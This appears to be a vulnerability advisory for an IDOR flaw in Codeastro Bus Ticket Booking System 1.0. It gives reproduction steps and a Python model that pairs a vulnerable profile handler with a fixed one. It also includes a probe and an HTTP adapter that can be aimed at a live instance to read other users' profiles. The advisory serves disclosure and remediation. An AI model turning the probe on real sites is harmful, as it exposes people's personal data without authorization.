Codeastro Bus Ticket Booking System Insecure Direct Object Reference Vulnerability

Vulnerability

Codeastro Bus Ticket Booking System version 1.0 exposes user profiles through an Insecure Direct Object Reference (IDOR). The profile page selects the record to display from a user ID supplied in the URL, and the application neither confirms that the requester is authenticated nor that the requested ID belongs to the requester. An attacker who changes the ID in the URL is therefore shown another user's profile.

Impact

Exploitation lets an unauthorized user view other users' profile records, disclosing whatever personal data the profile stores. Because the ID is a plain value in the URL, an attacker can walk through the ID space and collect every profile, not just one.

Reproduction

Log into the application with an account you control and open your own profile. Replace the user ID in the URL with the ID of a different account (preferably a second account you created for the test, so you know what its profile should contain). If the other user's profile is returned instead of a login prompt or an authorization error, the vulnerability is present. Requesting the same URL without any session shows whether the authentication check is missing as well.
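The following is an added example, not code from the Codeastro project or from the original advisory. It models the missing check in a few lines of Python alongside the corrected handler, and implements the two-account probe described above as a function that can be pointed at either the in-memory model or, through the adapter at the end, at a live instance. The endpoint layout `/profile.php?id=`, the session field names and the sample users are assumptions made for the example.

```python
"""IDOR on a profile page: vulnerable handler, fixed handler and a probe.

Hypothetical model, not the Codeastro application's own code.
"""
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, Dict, Optional


@dataclass
class Response:
    status: int
    body: str


# Constructed sample data standing in for the application's users table.
USERS: Dict[int, Dict[str, str]] = {
    1: {"name": "alice", "email": "alice@example.com", "phone": "555-0101"},
    2: {"name": "bob", "email": "bob@example.com", "phone": "555-0102"},
}


def render_profile(user: Dict[str, str]) -> str:
    return (f"<h1>Profile: {user['name']}</h1>"
            f"<p>{user['email']}</p><p>{user['phone']}</p>")


def profile_vulnerable(session: Optional[dict], requested_id: int) -> Response:
    """Trusts the id from the URL: anyone, logged in or not, can read any profile."""
    user = USERS.get(requested_id)
    if user is None:
        return Response(404, "not found")
    return Response(200, render_profile(user))


def profile_fixed(session: Optional[dict], requested_id: int) -> Response:
    """Authentication: a session is required.
    Authorization: the requested id must be the caller's own id."""
    if session is None or "user_id" not in session:
        return Response(302, "Location: /login.php")  # assumed login page
    if session["user_id"] != requested_id:
        return Response(403, "forbidden")  # someone else's record
    user = USERS.get(requested_id)
    if user is None:
        return Response(404, "not found")
    return Response(200, render_profile(user))


# A fetcher takes the tester's session (or None) and the id to request.
Fetch = Callable[[Optional[dict], int], Response]


def idor_probe(fetch: Fetch, session: dict, victim_id: int, victim_marker: str) -> bool:
    """Reproduce the finding with two accounts the tester controls.

    Logged in as `session`, request the victim's id and return True only if
    a 200 comes back whose body differs from the caller's own profile and
    contains a value known to belong to the victim account. The extra
    checks avoid a false positive on apps that ignore the id and always
    render the caller's own profile.
    """
    own = fetch(session, session["user_id"])
    other = fetch(session, victim_id)
    if other.status != 200:
        return False
    return other.body != own.body and victim_marker in other.body


def unauthenticated_read(fetch: Fetch, victim_id: int) -> bool:
    """True if the profile is served with no session at all."""
    return fetch(None, victim_id).status == 200


def http_fetch_factory(base_url: str) -> Fetch:
    """Adapter for a live instance. The URL layout is an assumption; the
    session dict must carry the tester's 'cookie' header and 'user_id'."""
    def fetch(session: Optional[dict], requested_id: int) -> Response:
        req = urllib.request.Request(f"{base_url}/profile.php?id={requested_id}")
        if session and "cookie" in session:
            req.add_header("Cookie", session["cookie"])
        try:
            with urllib.request.urlopen(req) as resp:
                return Response(resp.status, resp.read().decode(errors="replace"))
        except urllib.error.HTTPError as err:
            return Response(err.code, err.read().decode(errors="replace"))
    return fetch


if __name__ == "__main__":
    tester = {"user_id": 1}
    print("vulnerable handler leaks:", idor_probe(profile_vulnerable, tester, 2, "bob@example.com"))
    print("fixed handler leaks:     ", idor_probe(profile_fixed, tester, 2, "bob@example.com"))
    print("anonymous read (vuln):   ", unauthenticated_read(profile_vulnerable, 2))
```

Against a live target, build the fetcher with `http_fetch_factory("http://host")`, put the logged-in session cookie and your own user ID in the session dict, and pass the second test account's ID and a string only its profile contains (its e-mail address, for instance) as `victim_marker`. The fix shown in `profile_fixed` is the usual remediation for this class of bug: take the identity from the server-side session and compare it to the requested ID, or drop the URL parameter entirely and always render the session user's own record.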

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

  spread          1.0
  impact          0.6
  exploitability  7.8
  remediation     0.0
  relevance       0.0
  threat          6.4
  urgency         2.9
  incentive       1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.